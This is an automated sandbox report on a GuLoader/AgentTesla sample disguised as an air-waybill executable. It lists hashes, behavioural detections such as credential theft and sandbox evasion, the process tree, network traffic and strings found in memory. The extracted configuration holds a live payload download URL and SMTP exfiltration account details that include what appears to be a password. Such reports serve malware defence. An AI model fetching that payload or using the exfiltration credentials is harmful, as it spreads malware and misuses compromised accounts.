Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AWB# 6174229350.exe

Overview

General Information

Sample Name:AWB# 6174229350.exe
Analysis ID:671113
MD5:41bd0682b694583a44500d4035904843
SHA1:b347b198fc8cadcd7c332a58e96e36cc3aa66e99
SHA256:7500744cb96ef00da3854791e50622a7c5c0e1cdcf0708c7a7755070509d90b5
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • AWB# 6174229350.exe (PID: 7624 cmdline: "C:\Users\user\Desktop\AWB# 6174229350.exe" MD5: 41BD0682B694583A44500D4035904843)
    • CasPol.exe (PID: 1288 cmdline: "C:\Users\user\Desktop\AWB# 6174229350.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 4036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
{"Exfil Mode": "SMTP", "SMTP Info": "comunicacion@hemegas.es@Bastilipo1mail.hemegas.esanyaegbu.kay@gmail.com"}
{"Payload URL": "https://drive.google.com/uc?export=download&id=1OxFTk1n_IftuutTR1RHu7-wEtc6qeE_N"}
SourceRuleDescriptionAuthorStrings
00000001.00000002.83744400441.0000000002AA0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000003.00000002.88273977598.000000001DA51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000003.00000002.88273977598.000000001DA51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000003.00000000.83392924603.0000000001300000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000003.00000002.88277094128.000000001DBAE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 2 entries
            No Sigma rule has matched
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: AWB# 6174229350.exeVirustotal: Detection: 22%Perma Link
            Source: AWB# 6174229350.exeReversingLabs: Detection: 14%
            Source: 00000001.00000002.83744400441.0000000002AA0000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1OxFTk1n_IftuutTR1RHu7-wEtc6qeE_N"}
            Source: conhost.exe.4036.4.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "comunicacion@hemegas.es@Bastilipo1mail.hemegas.esanyaegbu.kay@gmail.com"}
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_20D0AF48 CryptUnprotectData,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 3_2_20D0B679 CryptUnprotectData,
            Source: AWB# 6174229350.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Bridie\MilieuteknikeresJump to behavior
            Source: AWB# 6174229350.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_00405A19 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_004065CE FindFirstFileA,FindClose,
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_004027AA FindFirstFileA,

            Networking

            barindex
            Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=1OxFTk1n_IftuutTR1RHu7-wEtc6qeE_N
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Joe Sandbox ViewIP Address: 37.59.226.102 37.59.226.102
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OxFTk1n_IftuutTR1RHu7-wEtc6qeE_N HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/5qkbcqatmvl66vlquhfk3geif26gbr2f/1658410125000/11160273513571171813/*/1OxFTk1n_IftuutTR1RHu7-wEtc6qeE_N?e=download&uuid=bec227ee-0406-4da7-b66d-39be02ab3f2d HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-00-as-docs.googleusercontent.comConnection: Keep-Alive
            Source: global trafficTCP traffic: 192.168.11.20:49775 -> 37.59.226.102:587
            Source: global trafficTCP traffic: 192.168.11.20:49775 -> 37.59.226.102:587
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: CasPol.exe, 00000003.00000002.88275679331.000000001DB16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
            Source: CasPol.exe, 00000003.00000002.88273977598.000000001DA51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: CasPol.exe, 00000003.00000002.88273977598.000000001DA51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
            Source: CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ac.economia.gob.mx/cps.html0
            Source: CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ac.economia.gob.mx/last.crl0G
            Source: CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://acedicom.edicomgroup.com/doc0
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83845421880.0000000020ADC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0
            Source: CasPol.exe, 00000003.00000003.83845421880.0000000020ADC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv2.crl0
            Source: CasPol.exe, 00000003.00000003.84838384291.000000001FC16000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88285610550.000000001FC16000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88285277114.000000001FBEA000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88276453202.000000001DB78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
            Source: CasPol.exe, 00000003.00000002.88277094128.000000001DBAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bKdsyNUZOlEkI4wH.org
            Source: CasPol.exe, 00000003.00000002.88277094128.000000001DBAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bKdsyNUZOlEkI4wH.orgt-4j
            Source: CasPol.exe, 00000003.00000003.84840339869.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88255831826.00000000016AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0g
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/crl/MTINAutoridadRaiz03
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/ocsp0
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
            Source: CasPol.exe, 00000003.00000003.83844261475.0000000020B0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://certs.oati.net/repository/OATICA2.crl0
            Source: CasPol.exe, 00000003.00000003.83844261475.0000000020B0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://certs.oati.net/repository/OATICA2.crt0
            Source: CasPol.exe, 00000003.00000003.83844261475.0000000020B0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crl
            Source: CasPol.exe, 00000003.00000003.83844261475.0000000020B0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crt08
            Source: CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
            Source: CasPol.exe, 00000003.00000003.84838384291.000000001FC16000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88285610550.000000001FC16000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88276453202.000000001DB78000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88285512813.000000001FC08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cps.letsencrypt.org0
            Source: CasPol.exe, 00000003.00000003.84838384291.000000001FC16000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88285610550.000000001FC16000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88285277114.000000001FBEA000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88276453202.000000001DB78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cps.siths.se/sithsrootcav1.html0
            Source: CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
            Source: AWB# 6174229350.exeString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
            Source: AWB# 6174229350.exeString found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
            Source: AWB# 6174229350.exeString found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
            Source: CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
            Source: CasPol.exe, 00000003.00000003.83719705668.0000000001707000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88256740795.0000000001707000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83714442349.0000000001707000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83715098913.0000000001707000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.84839767170.0000000001707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: CasPol.exe, 00000003.00000003.83845421880.0000000020ADC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.defence.gov.au/pki0
            Source: CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl0
            Source: CasPol.exe, 00000003.00000003.83719705668.0000000001707000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88256740795.0000000001707000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83714442349.0000000001707000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83715098913.0000000001707000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.84839767170.0000000001707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: CasPol.exe, 00000003.00000003.84838384291.000000001FC16000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88285610550.000000001FC16000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88285277114.000000001FBEA000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88276453202.000000001DB78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.oces.trust2408.com/oces.crl0
            Source: CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
            Source: CasPol.exe, 00000003.00000003.83844261475.0000000020B0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
            Source: CasPol.exe, 00000003.00000003.83844261475.0000000020B0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
            Source: CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
            Source: CasPol.exe, 00000003.00000003.83847950858.0000000020AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
            Source: CasPol.exe, 00000003.00000003.83847950858.0000000020AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0
            Source: CasPol.exe, 00000003.00000002.88284650818.000000001FB50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
            Source: CasPol.exe, 00000003.00000003.83844419373.0000000020B2F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88256248180.00000000016D2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83844748931.0000000020B38000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.84839285140.00000000016CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/CABD2A79A1076A31F21D253635CB0
            Source: CasPol.exe, 00000003.00000002.88284650818.000000001FB50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabg
            Source: CasPol.exe, 00000003.00000003.84838384291.000000001FC16000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88285610550.000000001FC16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://eca.hinet.net/repository/CRL2/CA.crl0
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://eca.hinet.net/repository/Certs/IssuedToThisCA.p7b05
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
            Source: CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
            Source: CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
            Source: CasPol.exe, 00000003.00000003.83847950858.0000000020AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;
            Source: CasPol.exe, 00000003.00000002.88276453202.000000001DB78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hemegas.es
            Source: CasPol.exe, 00000003.00000003.83845421880.0000000020ADC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://http.fpki.gov/fcpca/caCertsIssuedByfcpca.p7c0
            Source: CasPol.exe, 00000003.00000002.88276453202.000000001DB78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.hemegas.es
            Source: AWB# 6174229350.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: AWB# 6174229350.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: CasPol.exe, 00000003.00000003.83845421880.0000000020ADC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.eca.hinet.net/OCSP/ocspG2sha20
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.ncdc.gov.sa0
            Source: CasPol.exe, 00000003.00000003.83845421880.0000000020ADC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.gva.es0
            Source: CasPol.exe, 00000003.00000002.88290215195.0000000020B15000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83845370957.0000000020B15000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83844261475.0000000020B0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.suscerte.gob.ve0
            Source: CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pki.digidentity.eu/validatie0
            Source: CasPol.exe, 00000003.00000003.83848309152.0000000020B27000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88290367198.0000000020B27000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.84837616860.0000000020B27000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pki.registradores.org/normativa/index.htm0
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83844261475.0000000020B0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://policy.camerfirma.com0
            Source: CasPol.exe, 00000003.00000003.83845421880.0000000020ADC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://postsignum.ttc.cz/crl/psrootqca2.crl0
            Source: CasPol.exe, 00000003.00000003.84838384291.000000001FC16000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88285610550.000000001FC16000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88276453202.000000001DB78000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88285512813.000000001FC08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0U
            Source: CasPol.exe, 00000003.00000003.84838384291.000000001FC16000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88285610550.000000001FC16000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88276453202.000000001DB78000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88285512813.000000001FC08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r3.o.lencr.org0
            Source: AWB# 6174229350.exeString found in binary or memory: http://repository.certum.pl/ctnca.cer09
            Source: AWB# 6174229350.exeString found in binary or memory: http://repository.certum.pl/ctnca2.cer09
            Source: AWB# 6174229350.exeString found in binary or memory: http://repository.certum.pl/ctsca2021.cer0
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83845421880.0000000020ADC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/0
            Source: CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
            Source: AWB# 6174229350.exeString found in binary or memory: http://subca.ocsp-certum.com01
            Source: AWB# 6174229350.exeString found in binary or memory: http://subca.ocsp-certum.com02
            Source: AWB# 6174229350.exeString found in binary or memory: http://subca.ocsp-certum.com05
            Source: CasPol.exe, 00000003.00000003.83845421880.0000000020ADC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://web.ncdc.gov.sa/crl/nrcacomb1.crl0
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://web.ncdc.gov.sa/crl/nrcaparta1.crl
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.acabogacia.org/doc0
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.acabogacia.org0
            Source: CasPol.exe, 00000003.00000003.83845421880.0000000020ADC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
